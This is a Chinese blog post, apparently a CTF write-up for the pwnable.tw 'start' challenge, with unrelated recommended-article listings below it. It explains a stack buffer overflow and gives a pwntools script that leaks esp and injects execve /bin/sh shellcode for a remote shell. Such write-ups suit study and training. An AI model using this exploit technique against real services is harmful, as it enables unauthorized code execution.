start 记录

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量2.2k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55190422/article/details/121344445
版权

我们首先查看源码

 

 我们发现它没有开启任何保护

我们尝试运行一下

 所以这个汇编代码的这一部分

应该是把这个字符串压入栈内。

 反编译一下

 

这一部分应该是调用了sys这个函数 fd=1是标准输出

 

 buf的字节长是5*4=20个字节而这里的标准输入3Ch是六十个字节,明显是栈溢出了。

因为它什么保护都没有开启,所以我们可以控制返回地址,所以我们可以考虑传入shellcode,接着将返回地址覆盖到shellcode地址上,为了覆盖shellcode的地址,我们需要找到一个地址,就是esp,我们可以覆盖返回地址为08048087,那么程序会调回去,继续输出,而此时esp走到了esp的位置,会将esp的地址输出。

EXP:


from pwn import  *
p = remote('chall.pwnable.tw',10000)
 
p.recvuntil(':')
payload = 'a'*20 + p32(0x08048087)
p.send(payload)
 
addr = u32(p.recv(4))+20
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload = 'a'*20 + p32(addr) + shellcode
p.send(payload)
 
p.interactive()

VN's king
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle中的Start With关键字
Generment的博客
09-04 3万+
在oracle中遇到了Start With查询语句,经过查询资料了解现在总结一下. 参考文章:https://www.cnblogs.com/zyzdisciple/p/7873584.html 首先我们可以新建一个demo表做测试 create table DEMO ( ID varchar2(10) primary key, DSC varchar2(100), PID varchar2...
mysql start with connect by_MYSQL实现Oracle的Start with…Connect By递归树查询
weixin_36215364的博客
02-05 2562
最近接触一个老项目,最初适配的数据库是oracle 后来迁移到mysql 。这个迁移是由一个已经离职的新手做的。这个新手对于很多oracle特有的函数及存储过程都没有进行迁移。导致系统很多功能都BUG了。失效了。既然我遇到了,就尽量进行解决。刚刚遇到了一个存储过程中有使用oracle的Start with…Connect By递归树查询的。这个函数在mysql里面是没有的。但是我们可以通过自定义函...
Linux pwn入门教程(2)——shellcode的使用,原理与变形
dfdhxb995397的博客
07-03 715
作者:Tangerine@SAINTSEC 0×00 shellcode的使用 在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。然而在现实世界里并不是每个程序都有后门,即使是有,也没有那么好找。因此,我们就需要使用定制的shellcode来执行自己需要的操作。 首先我们把演示程序~/Openctf 2016-tyro_s...
CTFPWN的一些题型(持续更新......)
qq_44371274的博客
04-05 2097
ret2test 先运行一下,看程序做了些什么 发现只是让我们输入一串字符。接下来具体分析下属性,并且丢进gdb里分析一下 可以看到这是一个64位的程序,而且什么保护都没有开,接下来拖进IDA里继续分析 我们进入v4 F5反编译之后,可以很明显地看出程序有gets输入漏洞,gets可以读取无限长的字符串,我们就可以利用这个漏洞造成了一个栈溢出 发现分配的栈的空间大小是70,由于程序在返回地址前...
pwn学习日记Day3 基础知识积累
anxiong1803的博客
04-29 219
知识杂项 msfVENOM:Msfvenom是msf框架配套的攻击载荷生成器。 payload:有效载荷。 payload:目标系统上渗透成功后执行的代码。 Metasploit:一款开源的安全漏洞检测工具。 BufferRegister:缓冲寄存器 shellcode的变形 "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2...
sql start with用法
阿晖的博客
04-22 7044
转:http://myiteyeverywell-163-com.iteye.com/blog/1471752 我们经常会将一个比较复杂的目录树存储到一个表中。或者将一些部门存储到一个表中,而这些部门互相有隶属关系。这个时候你就会用到connect by prior start with。 connect by 是结构化查询中用到的,其基本语法是:   select ... from tablen...
Unable to start web server 错误处理记录
keny-大成的博客
01-17 6013
1.提示错误 用到最新的java 为13,Log4j2 error错误。 ERROR SpringApplication Application run failed org.springframework.context.ApplicationContextException: Unable to start web server; nested exception is org.spri...
创建express项目及npm start报错解决办法
大芊与小箎的博客
04-07 6156
express的安装这里简要的说一下 cnpm install express -g cnpm install -g express-generator 分别安装好express及其命令工具 切换到想要安装的项目路径,建立myapp项目 express myapp 接下来输入 npm start 这个时候博主就报错了 npm ERR! path F:\CODE\Node.js\package...
am start
rechanel的博客
07-31 9981
测试中经常会用到am start命令去进行操作,基本上也只用到 am start -n 和 am start -a ** -d **,后来测试activity启动用到了am start -W,才惊觉这个命令的功能还是很强大的,所以总结了一下,存档以备以后查看。 1. am start -n    解释:启动一个activity    e.g. am start -n com.and
net start mysql 服务无法启动问题的解决方法【记录
努力敲代码的小盆友
11-13 5960
连接MySQL数据库的时候显示”Can’t connect to MySQL server on localhost (10061)”的错误(莫名其妙的突然出现),又查询了网上所有的资料,试了一些net start mysql(显示服务无法启动。失败)、服务管理器里去启动MySQL的服务(显示本地计算机上的服务开启后停止,某些服务在未由其他服务或程序使用时将自动停止。失败)
Activity start Service
10-04
经常用到Activyt调用Service中的方法,但总是忘记,今天做了两个非常简单的例子,记录一下。blog地址:http://blog.csdn.net/guchuanhang/article/details/48893871
php利用session_start查看浏览记录
03-08
php利用session_start()读取浏览记录,如有些网站上的产品也会有浏览记录,输出你最近浏览过的产品
kern.log linux start
11-10
LINUX 启动日志记录(包含文件,函数,没有行数),内核版本5.3.1 添加打印日志添加打印日志添加打印日志
START_HERE
03-16
您可以删除遥控器并添加自己的遥控器,也可以删除git repo(easier),或者-或-删除遥控器可保留启动程序项目中的提交历史记录,并且rm -rf .git将完成删除它/ 删除远程并添加新的 删除原 git remote rm origin ...
Stylo-Start
03-18
您可以删除遥控器并添加自己的遥控器,也可以删除git repo(easier),或者-或-删除遥控器可保留启动程序项目中的提交历史记录,并且rm -rf .git将完成删除它/ 删除远程并添加新的 删除原 git remote rm origin ...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
qq_43684686的博客
06-17 342
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 590
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 382
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足复杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 165
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
pgsql start with
07-28
在PG中,可以使用WITH RECURSIVE语句来实现类似Oracle中的START WITH语法。WITH RECURSIVE允许我们递归地查询数据,并且可以指定递归的起始条件。 以下是一个示例查询,展示了如何在PG中使用WITH RECURSIVE来实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值